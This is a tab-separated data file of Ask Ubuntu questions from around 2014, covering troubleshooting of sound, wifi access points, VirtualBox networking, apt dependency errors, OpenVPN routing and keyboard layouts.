462463	ubuntu 14.04 - software center - edit- > software sources disabled	the button in software center→edit→software sources ... is disabled . is there another way to reach it or simple enable the button ? what could be causing it ? if i know i can fix it myself and avoid happening again . thanks !
462466	connecting usb internet to ubuntu	i have installed ubuntu desktop 13.10 through virtualbox which is running on windows 8 i 'm using reliance netconnect+ zte usb internet connection i 'm not able to connect ubuntu to this internet . i searched so many forums , i tried all the suggested steps but nothing is working . please help me to connect the internet to ubuntu desktop .
462467	using mv & cp on a headless server ( ssh timeout interferring ? )	i 've recently set up a headless server to back up a number of very large film & editing files . i ssh into the server and - following some best practice guides i found around - i 've tightened security so that the server auto logs me off after 5 minutes of inactivity . this is now creating a bit of a headache as i try to sort and move those files . issuing mv file1 /new_directory/ can take +5 mins and so i 'm often logged off half way through . where multiple files are involved i 've come back to find that some files seem to have transferred and others ( at a seemingly arbitrary cut off point ... or roughly what i reckon a 5 min timeout might have allowed ) have not . so my questions are : when issuing a mv command , if it is cancelled whilst incomplete is there any risk of data loss ? might i be safer using cp ? is there any way that i could set a cp or mv command to go and then be sure that it will continue even after i 've logged off or my ssh window has closed is there a way to do other things whilst a mv or cp is taking place ( and thus refresh my countdown timer )
462472	xubuntu 14.04 : how to enable hibernate ?	xubuntu 14.04 64 bit know that question been asked a billion times , but all of them consist of editing /etc/polkit-1/localauthority/50-local.d/com.ubuntu.enable-hibernate.pkla that file does not exist on my system ? i tried com.xubuntu.enable-hibernate.pkla but does n't exist either , locate command does n't find it .
462474	where is virtualbox adapter	in previous when i had win 7 and installed vmware . when i want to make a lan connection between my host ( my win 7 ) and guest ( any os suppose xp ) . i set connection to nat . after that i can ping my xp from win 7 and vice versa . also there were an interface adapter in my win 7 which i can change its ip . so where is this network adapter or is there any ? when i type ifconfig i do not see anything related to virtual network .
462475	what does `` reduce delta to ubuntu '' mean ?	in accepted apt 1.0.3 ( source all amd64 ) , this appears : changes : apt ( 1.0.3 ) unstable ; urgency=medium . [ michael vogt ] * reduce delta to ubuntu * provide support for vendor specific config files * debian/apt-doc.docs : remove readme.multiarch * fix missing screenwidth check in apt.cc * only do openpty ( ) if both stdin/stdout are terminals ( closes : 746434 ) . so what does `` reduce delta to ubuntu '' mean ?
462476	ipad 3 ios 7.1.1 sync music	is there any way to sync music to my ipad 3 on ios 7.1.1 ( as you can tell from the version , it is not and can not be jailbroken ) . when i connect to rhythmbox , it tells me it is corrupt or uninitialized , but will not let me select a model to initialize it . i 'm not sure what to do ? i 'm trying virtualbox with windows xp sp3 and itunes soon . edit* i was able to solve this , but not in a way that i had hoped . i wanted native , but it refused to work syncing through linux only . here is my setup to sync to ipad . install virtualbox install windows ( i installed windows xp sp3 because of its small size ) install itunes set up your linux music folder to be shared with the virtual machine set up itunes music library . sync music through itunes .
462481	i uninstalled ubuntu , but uefi manager still shows two boot options . is it ok to delete them ?	i installed ubuntu some time ago , and it went bad . i then uninstalled it , and a few weeks later reinstalled it and it went fine . later i uninstalled it also because of some problems , and after all of that i saw that i had still two ubuntu boot options on my uefi manager ( image below ) . windows booting is functioning well . now i want to install the newest version of ubuntu , but first i want to correct all things . so , what i would like to know is if it 's ok to just select the delete boot option for both of them .
462482	rndc refused connection and bind9 is not start	root @ ubuntu-server : / # service bind9 restart * stopping domain name service ... bind9 rndc : connect failed : 127.0.0.1 # 953 : connection refused [ ok ] * starting domain name service ... bind9 [ fail ] root @ ubuntu-server : / # rndc.key refused the connection i configure the two ip address in one lan card my ip address binding file # the primary network interface auto eth0 auto eth0:0 iface eth0 inet static address 192.168.1.1 netmask 255.255.255.224 network xxxxxxx broadcast xxxxxx gateway xxxxxxx # dns-* options are implemented by the resolvconf package , if installed dns-nameservers 8.8.8.8 xxxxxx dns-search xxxxx iface eth0:0 inet static address xxxxx netmask xxxxx network xxxx broadcast xxxxxx gateway xxxxxxxx if you need named.conf.local then i will also post here ...
462484	ca n't install tor . now i ca n't use apt-get	you might want to run âapt-get -f installâ to correct these . the following packages have unmet dependencies . tor-geoipdb : depends : tor ( > = 0.2.4.21-1~saucy+1 ) but it is not installed e : unmet dependencies . try using -f. i tried to install tor , it gave me an error & told me to use apt-get -f install , but now that wo n't work either . i just want to install tor & get rid of the error : )
462491	no packages are installing	i am trying to install myunity , but it wo n't install by apt-get install myunity . i get the following error : sudo apt-get install myunity [ sudo ] password for savageowl : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package myunity even more weird is that myunity is also found in the software center , and when i search for it , it 's not there . i also found a link that launches software center and sends you to myunity , and i got and error saying i dont have it . the same thing happened with skype , but i managed to get that installed from a debian package .
462493	ubuntu 14.04 install hangs at `` configuring bcmul-kernel-source ( amd64 ) ''	dell optiplex 210l , intel pentium 4 , 1gb ram installed ubuntu 14.04 lts i386 , added pci wifi card and usb logitech web-cam after install completed . was not able to get wifi or web-cam to work . attempting reinstall ubuntu 14.04 lts switching from 32 to 64 bit hoping that the fresh installation will find and load drivers for wifi and web-cam . however , installation is hung at `` configuring bcmwl-kernel-source ( amd64 ) '' . it has been at this point for several hours . should i skip this step and continue with the install ? the fact that i only have 1gb of ram , is that causing the problem ?
462494	mricro not running on ubuntu 14.04 lts	i did a normal installation of ubuntu 14.04 lts 64-bit last week , and then installed mricro but it just can not run , with the error /usr/local/bin/mricro/mribin : symbol lookup error : /usr/local/bin/mricro/mribin : undefined symbol : initpansistrings my machine is 64-bit , but i 'm not sure the author 's instruction applies to my situation or not . i googled for a while but found very few related info . i remember mricro runs smoothly on old ubuntu , like 11 ? ca n't remember the exact version number . does anyone have similar problem ? thanks in advance .
462495	14.04_lts and remote login ( uccs ) ?	upgraded my laptop to 14.04_lts from 13.10 not long ago and decided to check that `` remote login '' thingy i have on the login screen ( never used it before and i 'm pretty new to ubuntu ) so i tried to add a server after logging in via my ubuntu one account , some ip address available on my lan for a rdp server ( url via http ? ? and why rdp protocol only ? ) but when i try to login into the `` remote login '' it wo n't just work , it refuses my ubuntu one credentials ! from what i can find on the web is it me or that option is not available anymore anyway ?
462496	i can not use letter `` o '' with my keyboard . ( ubuntu 14.04 ) - dell xps 17 702x	after i upgraded from 13.04 to 13.10 and then 14.04 right after , i can not use caracter/letter `` o '' with my keyboard anymore . i did n't customize any shrotcut and no shortcut with this letter is involved . the layout is correct ( classic french keyboard just like when i had older ubuntu version ) . edit : the layout is not the problem since : when i change the layout to an eglish qwerty or even arabic , the `` o '' key does not print anything n screen ( console/text editor : in unity session ) . could you please help me , it 's quite embarrassing.. my pc is a dell xps 17 702x , if it may help . edit : 1 ) when i press the `` o '' key , i actually see the cursor blink like the computer aknoledged i pressed something , but nthing prints . 2 ) hre it gets interresting : when i long-press the `` o '' key , after half a second , multiple `` o '' appear : `` ooooooooo '' . it seams that only `` fast-pressing '' the `` o '' key is problematic !
462499	change automatically keyboard layout	i use custom keyboard layout . i have this script for setting it : # ! /bin/bash setxkbmap -verbose us -variant altgr-intl xmodmap -verbose ~/.myxmodmap the problem is , that plugging the keyboard will somehow cancel this setting and i 'm again in stardart us ascii . i created an udev rule , so that when the keyboard is plugged , it will run my script , but i ca n't get the environment of the script right , it does n't have access to x server capabilities , it would n't change my keyboard layout . output from xmodmap , when ran from udev rule : using command line , ignoring x server
462501	installing wine on ubuntu 14.04	tried several times to install wine , see the terminal output below : ray @ ray-aspire-5735 : ~ $ sudo add-apt-repository ppa : ubuntu-wine/ppa welcome to the wine team ppa . here you can get the latest available wine betas for every supported version of ubuntu . this ppa is managed by scott ritchie and maarten lankhorst . more info : https : //launchpad.net/~ubuntu-wine/+archive/ppa press [ enter ] to continue or ctrl-c to cancel adding it gpg : keyring `/tmp/tmpyk6b2mg8/secring.gpg ' created gpg : keyring `/tmp/tmpyk6b2mg8/pubring.gpg ' created gpg : requesting key f9cb8db0 from hkp server keyserver.ubuntu.com gpg : /tmp/tmpyk6b2mg8/trustdb.gpg : trustdb created gpg : key f9cb8db0 : public key `` launchpad ppa for ubuntu wine team '' imported gpg : no ultimately trusted keys found gpg : total number processed : 1 gpg : imported : 1 ( rsa : 1 ) ok i 'm clearly doing something wrong - but just what ?
462503	ubuntu 14.04 sound suddenly stopped working , reboot did not fix	i am running ubuntu 14.04 on an asus x52j laptop . i was watching a lecture on google chrome , when suddenly , all sound was lost . throughout the pc . no sounds from chrome ( even though chrome indicates it does play sound ) . no sounds from vlc , and no sounds from pulseaudio 's sound tests . i 've tried : restarting pulseaudio via pulseaudio -- kill . reloading alsa via alsa reload and alsa force-reload . checking the alsa mixer via alsamixer , nothing out of the ordinary . restart my pc . did not help , did n't even hear the drum sound on startup . mved my ~/.config/pulse file away and killed pulseaudio again . pacmd list-sinks | grep muted indicates that nothing is muted . i 'm not sure what to do anymore . could this be a hardware problem ? is there anything i have n't tried yet ? output of aplay -l : madara @ madara-pc : ~ $ aplay -l **** list of playback hardware devices **** card 0 : mid [ hda intel mid ] , device 0 : conexant analog [ conexant analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 1 : hdmi [ hda ati hdmi ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 0/1 subdevice # 0 : subdevice # 0
462504	vpn controls not working now with 14.04	i 'm using open vpn with the default ubuntu interface ( upper right hand corner ) . once i make a connection it wo n't let me disconnect . with 13.10 it was working fine , now with 14.04 it 's not . it 's the same for both of my computers .
462505	running ubuntu and win7 on the same system	so i have previously used ubuntu on a vm , and was wanting to install it so that i could run it straight from startup . i looked at some tutorials and saw that many of them required a decent amount of configuration ( cds , partitioning etc ) , but then i stumbled upon this link . http : //www.wikihow.com/install-ubuntu-linux-without-cd- ( windows ) is there anything wrong with this method ? why is it so simple while other installations require you to do all this other stuff beforehand ? thanks for any help
462507	taming the mouse	i have some irritating problems with my mouse : often i click once but get a result like double-click ; often i try to mark a block text using click-and-drag , and in the middle of the block , the text becomes unmarked . i tried another mouse and got the same problems . i opened the `` mouse '' settings of ubuntu , moved the sliders here and there , but did n't notice an improvement . is there another way in ubuntu to tame the mouse ?
462508	application that can send files from ubuntu to windows ?	instead of using usb and copy my files , rebooting , go to windows and paste it , i want an application that can send files to windows from ubuntu without internet and rebooting . i 'm using lubuntu 12.04 and windows xp . please give me solutions of applications like how i described it . any answer is appreciated .
462511	which should i run , dia-normal or dia-gnome ?	i 've installed packages dia , dia-common , and dia-gnome . i observe that there are multiple programs installed in /usr/bin : dia-normal , dia-gnome , dia-normal-integrated , dia-gnome-integrated . finally , i notice that /usr/bin/dia is a symlink maintained by the alternatives system . upon invoking the `` -integrated '' versions of dia , i see that the controls are in the same window , rather than separate ( as for example , gimp does it ) . i can not determine any difference in behavior between invoking the `` normal '' and the `` gnome '' versions . what is the difference between dia-normal and dia-gnome ? why would i choose one over the other ? i am using ubuntu 12.04.4 lts .
462514	ubuntu 14.04 - resolution stuck on 640x480 running in virtual box 4.3.10 ver on windows 7	i am using virtual box 4.3.10 updated version and it caused my ubuntu 14.04 to be stuck on small resolution . can anyone help me to fix this issue ? i was read on the internet you can resolve this by installing the `` insert guest additional image '' . when i do this it gives me an error message saying you can not mount it this image or force it to mount . if i select force nothing really happens . i have downloaded the `` guest image '' to the vbox in guest account . but it does n't let me install it cause i am not the su . i am new at linux . please advise what steps to take . thanks i fixed it 2 min ago see link below how do i install guest additions in a virtualbox vm ?
462515	installing ubuntu 14.04 on a brand new laptop ( freedos )	i am going to buy a new laptop this month , i 'm going to get without any os installed . my question is about the partiotioning and it is especially creating the partiotions when installing ubuntu . the three partiotions / , /home and swap . could you explain me how to do it or give me a walkthrough/guide ?
462517	unity launcher stays behind windows	i have been having a problem with unity launcher recently . launcher stay behind my windows and i ca n't bring it to the front of my windows ! as you can see , the nautilus window is in front of the launcher menu and the menus are totally inaccessible when the window is maximized .
462520	why does lubuntu not respect my keyboard preferences ?	i’ve just installed lubuntu 14.04 on my laptop ( replacing the previous dual boot ubuntu 13.10 / windows 7 , which my poor little laptop really didn’t have the space for ) . as part of the installation process , i was asked to select my keyboard layout . i selected irish , and double-checked that the problematic keys ( `` , @ , € ) worked correctly . everything seemed fine . now that the installation is complete , however , i have a us keyboard with no obvious way to change it ( and no obvious way to type the € symbol ) . i am , of course , interested in fixing this , but i’d also like to know why this happened in the first place .
462521	corebird twitter client for ubuntu 14.04	i have recently installed ubuntu on my laptop ( wubi method ) and i 'm very pleased . all and all it does everything that i need , but recently i heard about corebird - a twitter client that looks spot on . i have been searching but i could n't find how to install it on ubuntu 14.04 . can you help me doing so ? i have tried other twitter clients like hotot , turpial and birdie , but i do n't like them that much . thanks in advance , cheers ! edit i have finally installed valac . however , there is another problem with gtk+-3.12.0 . after typing ./configure , i get : configure : error : package requirements ( glib-2.0 > = 2.39.5 atk > = 2.7.5 pango > = 1.32.4 cairo > = 1.12.0 cairo-gobject > = 1.12.0 gdk-pixbuf-2.0 > = 2.27.1 ) were not met : no package 'pango ' found no package 'cairo ' found no package 'cairo-gobject ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables base_dependencies_cflags and base_dependencies_libs to avoid the need to call pkg-config . see the pkg-config man page for more details .
462524	backup ubuntu from wubi	so , i installed ubuntu 12.04 with wubi , and i want to install ubuntu , from usb , onto a different partition on my hard drive . i want to know , if i backup my wubi installation , can i restore it from the actual ubuntu installation ?
462528	nvrm : xid nvidia geforce go 6150 ubuntu 14.04	3d compiz and ubuntu 14.04 hangs . in /var/log/syslog shows the error : nvrm : xid ( 0000:00:05 ) : 13 , 0000 000091d8 00000002 00000104 e0016100 0,000,008th nvrm : xid ( 0000:00:05 ) : 9 , channel 00000020 instance 00000000 intr 00100000 nvrm : xid ( 0000:00:05 ) : 9 , channel 00000020 instance 00000000 intr 00100000 nvrm : xid ( 0000:00:05 ) : 9 , channel 00000020 instance 00000000 intr 00100000 my hardware is a hp pavilion dv2000 with nvidia geforce go 6150 .
462531	append dns suffix - wifi vs physical	so a while back i changed my dhcp config to appended a dns suffix automatically . i modified the.. /etc/dhcp/dhclient.conf ..config file and added the a line.. append domain-name `` mydomain.net '' ; ..and it worked ! but for some reason this did n't carry over to wifi , only my wired connection took the change and successfully automatically applies the suffix . when i am on wifi ( on the same network ) i still have to add mydomain.net to every url . i found this odd as i thought that file was for all network interfaces . what 's going on ?
462532	error installing packages using synaptic in ubuntu 14.04 ?	each time i install something with synaptic i received the following error when i click in details : ( synaptic:16174 ) : glib-critical ** : g_child_watch_add_full : assertion 'pid > 0 ' failed the packages are installed with no problem at all . i have google it and i know that many people have this error i was wondering if this is already being analysed or if there is a fix for it ... error message from synaptic :
462533	route all traffic through openvpn	yep , this question has been asked a hundred times , and i have searched everywhere , to no avail . the title says it all really . i have an openvpn server ( on ubuntu ) , and i can connect to it through my client ( windows 8 ) ... the problem starts when i try to route all traffic through the vpn . i have added the push flags in server.conf : push `` redirect-gateway def1 '' push `` dhcp-option dns 8.8.8.8 '' when i connect from the client , the client outputs : wed may 07 21:38:40 2014 sent control [ stretchvpn-ca ] : 'push_request ' ( status=1 ) wed may 07 21:38:41 2014 push : received control message : 'push_reply , redirect-gateway def1 , dhcp-option dns 8.8.8.8 , route-gateway < remote router ip > , ping 10 , ping-restart 120 , ifconfig 192.168.0.201 255.255.255.0' wed may 07 21:38:41 2014 options import : timers and/or timeouts modified wed may 07 21:38:41 2014 options import : -- ifconfig/up options modified wed may 07 21:38:41 2014 options import : route options modified wed may 07 21:38:41 2014 options import : route-related options modified wed may 07 21:38:41 2014 options import : -- ip-win32 and/or -- dhcp-option options modified wed may 07 21:38:41 2014 do_ifconfig , tt- > ipv6=0 , tt- > did_ifconfig_ipv6_setup=0 wed may 07 21:38:41 2014 open_tun , tt- > ipv6=0 wed may 07 21:38:41 2014 tap-win32 device [ local area connection 4 ] opened : \\.\global\ { 1f145805-92fc-454e-8fd9-0a6017dd4ad1 } .tap wed may 07 21:38:41 2014 tap-windows driver version 9.9 wed may 07 21:38:41 2014 notified tap-windows driver to set a dhcp ip/netmask of 192.168.0.201/255.255.255.0 on interface { 1f145805-92fc-454e-8fd9-0a6017dd4ad1 } [ dhcp-serv : 192.168.0.0 , lease-time : 31536000 ] wed may 07 21:38:41 2014 successful arp flush on interface [ 35 ] { 1f145805-92fc-454e-8fd9-0a6017dd4ad1 } wed may 07 21:38:46 2014 test routes : 1/1 succeeded len=0 ret=1 a=0 u/d=up wed may 07 21:38:46 2014 c : \windows\system32\route.exe add < remote router ip > mask 255.255.255.255 172.20.10.1 wed may 07 21:38:46 2014 route : createipforwardentry succeeded with dwforwardmetric1=25 and dwforwardtype=4 wed may 07 21:38:46 2014 route addition via ipapi succeeded [ adaptive ] wed may 07 21:38:46 2014 c : \windows\system32\route.exe add 0.0.0.0 mask 128.0.0.0 192.168.0.3 wed may 07 21:38:46 2014 route : createipforwardentry succeeded with dwforwardmetric1=30 and dwforwardtype=4 wed may 07 21:38:46 2014 route addition via ipapi succeeded [ adaptive ] wed may 07 21:38:46 2014 c : \windows\system32\route.exe add 128.0.0.0 mask 128.0.0.0 192.168.0.3 wed may 07 21:38:46 2014 route : createipforwardentry succeeded with dwforwardmetric1=30 and dwforwardtype=4 wed may 07 21:38:46 2014 route addition via ipapi succeeded [ adaptive ] wed may 07 21:38:46 2014 initialization sequence completed i have tried using the flags on the client side when opening the connection : openvpn -- config `` c : \program files\openvpn\config\client.ovpn '' -- redirect-gateway def1 -- route-method exe but still , when i go to whatsmyip.org , it still says my clients ip . has anyone had this problem and managed to solve it ? many thanks
462534	getting wifi ap working with hostapd and isc-dhcp-server [ xubuntu 14.04 ]	i have tried using ap-hotspot from webupd8 , and it did not work for me in 13.10 or 14.04 , so i have been working on getting hostapd manually set up , using isc-dhcp-server since dnsmasq was having conflicts for me . i have been able to connect to the ap , and get an ip , but routing does not seem to want to work . here is my build log and the guides i have been following ( http : //askubuntu.com/a/180734/279108 ) ( thenewbieblog.wordpress.com/2012/05/01/wifi-hotspot-setup-on-ubuntu/ ) ( danbishop.org/2011/12/11/using-hostapd-to-add-wireless-access-point-capabilities-to-an-ubuntu-server/ ) config files : /etc/network/interfaces auto lo iface lo inet loopback auto wlan0 iface wlan0 inet static hostapd -dd /etc/hostapd/hostapd.conf address 10.10.0.1 netmask 255.255.255.0 /etc/default/hostapd run_daemon= '' yes '' daemon_conf= '' /etc/hostapd/hostapd.conf '' daemon_opts= '' -dd '' /etc/hostapd/hostapd.conf # wifi hotspot interface=wlan0 driver=nl80211 # access point ssid=workshop hw_mode=g # wifi channel : channel=1 macaddr_acl=0 auth_algs=1 ignore_broadcast_ssid=0 wpa=2 wpa_passphrase=mypass wpa_key_mgmt=wpa-psk wpa_pairwise=tkip rsn_pairwise=ccmp /etc/dhcp/dhcpd.conf ddns-update-style none ; # default-lease-time 600 ; # max-lease-time 7200 ; log-facility local7 ; subnet 10.10.0.0 netmask 255.255.255.0 { range 10.10.0.2 10.10.0.32 ; option domain-name-servers 208.67.222.222 , 208.67.220.220 ; option routers 10.10.0.1 ; } /etc/rc.local iptables -t nat -a postrouting -s 10.10.0.0/32 -o eth1 -j masquerade exit 0 sudo ifconfig wlan0 10.10.0.1 sudo sysctl net.ipv4.ip_forward=1 sudo ip link set dev wlan0 up sudo service hostapd start i have installed bridge-utils , but i have not added br0 yet because i am not sure how to change the other parts of my config to reflect it ... edit : after double checking my configs through another ( older ) guide , tried again and decided to add what shows up in the logs when something connects . the device connecting is my android phone , which connects fine through normal routers . [ i understand most of what is going on in the logs , and startup looks fine . then scrolling randomness ... ] add randomness : count=52 entropy=51 mgmt : :auth authentication : sta=a0 : f4:50:18 : a2 : c3 auth_alg=0 auth_transaction=1 status_code=0 wep=0 new sta wlan0 : sta a0 : f4:50:18 : a2 : c3 ieee 802.11 : authentication ok ( open system ) wlan0 : sta a0 : f4:50:18 : a2 : c3 mlme : mlme-authenticate.indication ( a0 : f4:50:18 : a2 : c3 , open_system ) wlan0 : sta a0 : f4:50:18 : a2 : c3 mlme : mlme-deletekeys.request ( a0 : f4:50:18 : a2 : c3 ) authentication reply : sta=a0 : f4:50:18 : a2 : c3 auth_alg=0 auth_transaction=2 resp=0 ( ie len=0 ) add randomness : count=53 entropy=52 mgmt : :auth cb wlan0 : sta a0 : f4:50:18 : a2 : c3 ieee 802.11 : authenticated mgmt : :assoc_req association request : sta=a0 : f4:50:18 : a2 : c3 capab_info=0x431 listen_interval=20 new aid 1 wlan0 : sta a0 : f4:50:18 : a2 : c3 ieee 802.11 : association ok ( aid 1 ) add randomness : count=54 entropy=53 mgmt : :assoc_resp cb wlan0 : sta a0 : f4:50:18 : a2 : c3 ieee 802.11 : associated ( aid 1 ) wlan0 : sta a0 : f4:50:18 : a2 : c3 mlme : mlme-associate.indication ( a0 : f4:50:18 : a2 : c3 ) wlan0 : sta a0 : f4:50:18 : a2 : c3 mlme : mlme-deletekeys.request ( a0 : f4:50:18 : a2 : c3 ) wpa_driver_nl80211_set_key : ifindex=3 alg=0 addr=0x9f8ac90 key_idx=0 set_tx=1 seq_len=0 key_len=0 addr=a0 : f4:50:18 : a2 : c3 wlan0 : sta a0 : f4:50:18 : a2 : c3 wpa : event 1 notification wpa_driver_nl80211_set_key : ifindex=3 alg=0 addr=0x9f8ac90 key_idx=0 set_tx=1 seq_len=0 key_len=0 addr=a0 : f4:50:18 : a2 : c3 ieee 802.1x : ignore sta - 802.1x not enabled or forced for wps wlan0 : sta a0 : f4:50:18 : a2 : c3 wpa : start authentication wpa : a0 : f4:50:18 : a2 : c3 wpa_ptk entering state initialize wpa_driver_nl80211_set_key : ifindex=3 alg=0 addr=0x9f8ac90 key_idx=0 set_tx=1 seq_len=0 key_len=0 addr=a0 : f4:50:18 : a2 : c3 wlan0 : sta a0 : f4:50:18 : a2 : c3 ieee 802.1x : unauthorizing port wpa : a0 : f4:50:18 : a2 : c3 wpa_ptk_group entering state idle wpa : a0 : f4:50:18 : a2 : c3 wpa_ptk entering state authentication wpa : a0 : f4:50:18 : a2 : c3 wpa_ptk entering state authentication2 wpa : re-initialize gmk/counter on first station get randomness : len=32 entropy=54 gmk - hexdump ( len=32 ) : [ removed ] get randomness : len=32 entropy=22 key counter - hexdump ( len=32 ) : [ removed ] get randomness : len=16 entropy=0 gtk - hexdump ( len=16 ) : [ removed ] wpa_driver_nl80211_set_key : ifindex=3 alg=3 addr=0x80dd6be key_idx=1 set_tx=1 seq_len=0 key_len=16 broadcast key wpa : assign anonce - hexdump ( len=32 ) : 12 53 6f 26 8a a3 87 09 b4 31 e2 81 ef c3 ea 3e 6c 3d 0c a5 fb 85 07 f2 0a 2a 4a 5e a2 00 59 e9 wpa : a0 : f4:50:18 : a2 : c3 wpa_ptk entering state initpsk wpa : a0 : f4:50:18 : a2 : c3 wpa_ptk entering state ptkstart wlan0 : sta a0 : f4:50:18 : a2 : c3 wpa : sending 1/4 msg of 4-way handshake wpa : send eapol ( version=2 secure=0 mic=0 ack=1 install=0 pairwise=8 kde_len=0 keyidx=0 encr=0 ) wpa : use eapol-key timeout of 100 ms ( retry counter 1 ) nl80211 : event message available nl80211 : new station a0 : f4:50:18 : a2 : c3 ieee 802.1x : a0 : f4:50:18 : a2 : c3 tx status - version=2 type=3 length=95 - ack=1 wpa : eapol-key tx status for sta a0 : f4:50:18 : a2 : c3 ack=1 wpa : increase initial eapol-key 1/4 timeout by 1000 ms because of acknowledged frame ieee 802.1x : 121 bytes from a0 : f4:50:18 : a2 : c3 ieee 802.1x : version=1 type=3 length=117 wpa : received eapol-key from a0 : f4:50:18 : a2 : c3 key_info=0x10a type=2 key_data_length=22 wpa : received key nonce - hexdump ( len=32 ) : 7c 4d 99 9f 10 56 93 84 a9 8a f8 15 d8 8e 1e 6d 2f 39 95 8f bc 99 9a 4c 06 3d 37 65 e6 db 49 fa wpa : received replay counter - hexdump ( len=8 ) : 00 00 00 00 00 00 00 01 add randomness : count=55 entropy=0 wlan0 : sta a0 : f4:50:18 : a2 : c3 wpa : received eapol-key frame ( 2/4 pairwise ) wpa : a0 : f4:50:18 : a2 : c3 wpa_ptk entering state ptkcalcnegotiating wpa : ptk derivation - a1=90:4c : e5:55:94:4d a2=a0 : f4:50:18 : a2 : c3 wpa : nonce1 - hexdump ( len=32 ) : 12 53 6f 26 8a a3 87 09 b4 31 e2 81 ef c3 ea 3e 6c 3d 0c a5 fb 85 07 f2 0a 2a 4a 5e a2 00 59 e9 wpa : nonce2 - hexdump ( len=32 ) : 7c 4d 99 9f 10 56 93 84 a9 8a f8 15 d8 8e 1e 6d 2f 39 95 8f bc 99 9a 4c 06 3d 37 65 e6 db 49 fa wpa : pmk - hexdump ( len=32 ) : [ removed ] wpa : ptk - hexdump ( len=48 ) : [ removed ] wpa : a0 : f4:50:18 : a2 : c3 wpa_ptk entering state ptkcalcnegotiating2 wpa : a0 : f4:50:18 : a2 : c3 wpa_ptk entering state ptkinitnegotiating wlan0 : sta a0 : f4:50:18 : a2 : c3 wpa : sending 3/4 msg of 4-way handshake wpa : send eapol ( version=2 secure=1 mic=1 ack=1 install=1 pairwise=8 kde_len=46 keyidx=1 encr=1 ) plaintext eapol-key key data - hexdump ( len=56 ) : [ removed ] wpa : use eapol-key timeout of 100 ms ( retry counter 1 ) ieee 802.1x : a0 : f4:50:18 : a2 : c3 tx status - version=2 type=3 length=151 - ack=1 wpa : eapol-key tx status for sta a0 : f4:50:18 : a2 : c3 ack=1 ieee 802.1x : 99 bytes from a0 : f4:50:18 : a2 : c3 ieee 802.1x : version=1 type=3 length=95 wpa : received eapol-key from a0 : f4:50:18 : a2 : c3 key_info=0x30a type=2 key_data_length=0 wpa : received key nonce - hexdump ( len=32 ) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 wpa : received replay counter - hexdump ( len=8 ) : 00 00 00 00 00 00 00 02 wlan0 : sta a0 : f4:50:18 : a2 : c3 wpa : received eapol-key frame ( 4/4 pairwise ) wpa : a0 : f4:50:18 : a2 : c3 wpa_ptk entering state ptkinitdone wpa_driver_nl80211_set_key : ifindex=3 alg=3 addr=0x9f8ac90 key_idx=0 set_tx=1 seq_len=0 key_len=16 addr=a0 : f4:50:18 : a2 : c3 wlan0 : ap-sta-connected a0 : f4:50:18 : a2 : c3 wlan0 : sta a0 : f4:50:18 : a2 : c3 ieee 802.1x : authorizing port wlan0 : sta a0 : f4:50:18 : a2 : c3 radius : starting accounting session 536c1843-00000000 wlan0 : sta a0 : f4:50:18 : a2 : c3 wpa : pairwise key handshake completed ( rsn ) add randomness : count=56 entropy=1 [ more randomness , until i ctrl+c ]
462538	scilab advanced cli problem	i am using ubuntu 14.04 . i have recently installed scilab . but whenever i launch scilab advanced cli i get a message at the top saying : mlibegl warning : dri2 : failed to authenticate i have an intergared amd 6620g gpu ( of a8-3520m ) any suggestions ? thanks everyone : )
462540	how to get rid of kde look and feel parts in other des ?	i 've installed kubuntu-desktop to try . kde disappointed me , i removed it by means of sudo apt-get remove -- purge kde-* , then autoremove ( it is well known that just sudo apt-get remove -- purge kubuntu-desktop does n't remove anything ) . but parts of kde l & f ( icons , fonts & colors ) polluted unity and xfce environments . it looks really ugly . i 've `` reinstalled '' unity ( apt-get install ubuntu-desktop ) , it does n't help .
462544	when can i suspend do-release-upgrade ? what 's the risk ?	i had to suspend a running do-release-upgrade , after it was already going on an hour or so . doing ctrl+z was easy , the program did stop . understanding what that means , technically , seems to be more complicated . it was running since an hour or so when suspending ( on a slow netbook hdd ) , so i do n't really now the state it is in . based on the runtime , i expected it to be in the middle of replacing packages , too late to cancel . the screen output was about unpacking individual packages - but i 'm unclear whether that means `` unpacking to overwrite old '' as opposed to `` just unpacking ( to some staging area ) '' . to make the question and answers more generally useful , let 's discuss what happens for any states the upgrade may be in , not only my particular case . so , after suspending , i started the chromium-browser , which came up just fine . let 's assume the system will be used by an typical desktop session for some hours now . i would not be too surprised if i can do that without problems , just send a sigcont to do-release-upgrade later , and watch it completing . even if it turns out that my system is in the middle of being replaced completely . but we have these big scary warnings from do-release-upgrade , that nothing can be stopped once it started changing the system , and i fully expect that there are things that could go really wrong . but for now , i have not much idea what that would be , and why . understanding that , partially or completely , seems to be helpful to recover from related problems even outside of do-release-upgrade . maybe we can learn something from my live case , but i also remember a similar situation where i attempted to use a gui system during running do-release-upgrade , which was showing some interesting symptoms . the most prominent was that some fonts vanished from live running programs . it was something like the gnome panel , and also the window titles , that suddenly started drawing boxes - but did not suddenly use an updated font later . but the programs were running fine . also , i was keeping some about dialogs of kde programs open . they stayed open , showing the old version , even after the program had been obviously replaced . quite possible i had stopped the old program , though . an important aspect is certainly how a typical linux file system works in terms of deleting files that are still kept open by running processes : the reference from opening a file , that is known inside one program only , is as good as a normal file name , when it comes to deleting a file . as long as at least one reference of either kind exists , the file is not deleted , by definition . that means it 's technically no problem to keep a rogram running , update it- replacing the old version , start another instance , and see two different versions running at the same time . they should even have the same file name . so , somehow it 's surprisingly robust , but on the other hand , there certainly have to be weak points ... things like replacing libc , or some infrastructure services ... seems odd to even hope it could work ! ?
462545	iptables command to give internet to my guest os via virtual box	based on this link there is a difference between host-only network and nat . so i want to set the lan connection between my host -14.04 ubuntu- and my guest xp by host-only network . how i can give internet connection to my xp ? can any one give me iptables commands which i should write in order to give my xp machine access to the internet ?
462546	how to restart x server with the old key combination ( ctrl -alt - backspace ) in 14.04	i know that since 11.04 the keyboard short-cut of ctrl+alt+backspace has been disabled by default . however at least as recently as 12.04 you were able to enable it via the keyboard gui : the keyboard options in 14.04 are much more limited and there appears to be no way to re-enable this function : is there any way to re-enable this function ? all my searches of au as well as a full internet search have provided no workable answers for 14.04 .
